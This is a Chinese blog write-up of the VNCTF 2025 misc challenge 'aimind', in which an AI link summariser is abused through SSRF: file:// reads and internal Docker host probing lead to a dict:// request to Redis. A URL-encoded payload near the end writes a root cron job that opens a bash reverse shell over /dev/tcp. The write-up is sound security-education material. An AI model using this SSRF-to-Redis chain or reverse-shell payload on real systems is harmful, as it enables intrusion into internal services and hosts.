VNCTF 2025 misc aimind WriteUP

01207
图片[1]-VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

题目访问后可以输入链接,输入后ai会自动总结链接的内容。猜测可能会有ssrf注入问题。

简单fuzz一下,比如试试伪协议file之类的,可以发现读取和相关环境,当然也可以读取app文件拿到题目源码

图片[2]-VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

读一下host

图片[3]-VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

发现存在docker容器ip,尝试fuzz一下172.18.0.1或者0.3

图片[4]-VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

发现0.3存在一个ip服务,比较经典的考点,尝试fuzz一下redis端口,用dict协议直接打6379端口看info

图片[5]-VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

可以发现成功拿到信息了,后面就很简单了,直接dict写计划任务反弹shell就行了,payload如下

dict://172.18.0.3:6379/set%3Amars%3A%5C%5C%22%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fip%2F12333%200%3E%261%5Cn%5C%5C%22

最后catflag即可

图片[6]-VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
AICTFWP
喜欢就支持一下吧
点赞7 分享
魔法少女雪殇的头像-魔法少女雪殇钻石会员
Goerli与Sepolia,mumbai测试币领取-魔法少女雪殇
Goerli与Sepolia,mumbai测试币领取
Goerli与Sepolia,mumbai测试币领取
3年前 6972
CISCN2021 初赛 Write UP-魔法少女雪殇
CISCN2021 初赛 Write UP
CISCN2021 初赛 Write UP
4年前 6337
AntCTF x D^3CTF 个人Write Up-魔法少女雪殇
AntCTF x D^3CTF 个人Write Up
AntCTF x D^3CTF 个人Write Up
4年前 6233
开源CTF平台踩坑与评价(更新了两个平台)-魔法少女雪殇
开源CTF平台踩坑与评价(更新了两个平台)
开源CTF平台踩坑与评价(更新了两个平台)
4年前 5722
陇剑杯 个人 ’WriteUp‘-魔法少女雪殇
陇剑杯 个人 ’WriteUp‘
陇剑杯 个人 ’WriteUp‘
4年前 4863
红帽杯2021 Write UP-魔法少女雪殇
红帽杯2021 Write UP
红帽杯2021 Write UP
4年前 4424
相关推荐
CISCN2021 初赛 Write UP-魔法少女雪殇
CISCN2021 初赛 Write UP
CISCN2021 初赛 Write UP
4年前 6337
AntCTF x D^3CTF 个人Write Up-魔法少女雪殇
AntCTF x D^3CTF 个人Write Up
AntCTF x D^3CTF 个人Write Up
4年前 6233
陇剑杯 个人 ’WriteUp‘-魔法少女雪殇
陇剑杯 个人 ’WriteUp‘
陇剑杯 个人 ’WriteUp‘
4年前 4863
红帽杯2021 Write UP-魔法少女雪殇
红帽杯2021 Write UP
红帽杯2021 Write UP
4年前 4424
首届网刃杯工控ctf WriteUp-魔法少女雪殇
首届网刃杯工控ctf WriteUp
首届网刃杯工控ctf WriteUp
4年前 3431
2022祥云杯ALLMISC Writeup-魔法少女雪殇
2022祥云杯ALLMISC Writeup
2022祥云杯ALLMISC Writeup
3年前 2627
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]

    暂无评论内容

WMCTF 2024 AI方向官方wp-魔法少女雪殇

1WMCTF 2024 AI方向官方wp

魔法少女雪殇的头像-魔法少女雪殇钻石会员6个月前
458
西湖论剑2025 cscs write up-魔法少女雪殇

2西湖论剑2025 cscs write up

魔法少女雪殇的头像-魔法少女雪殇钻石会员1个月前
240
VNCTF 2025 misc aimind WriteUP-魔法少女雪殇

3VNCTF 2025 misc aimind WriteUP

魔法少女雪殇的头像-魔法少女雪殇钻石会员43天前
120
obsidian webdav 同步最佳实践-魔法少女雪殇

4obsidian webdav 同步最佳实践

魔法少女雪殇的头像-魔法少女雪殇钻石会员10天前
75
rust重构之StegSolve-魔法少女雪殇

5rust重构之StegSolve

魔法少女雪殇的头像-魔法少女雪殇钻石会员1个月前
133
2024 年终总结-魔法少女雪殇

62024 年终总结

魔法少女雪殇的头像-魔法少女雪殇钻石会员3个月前
145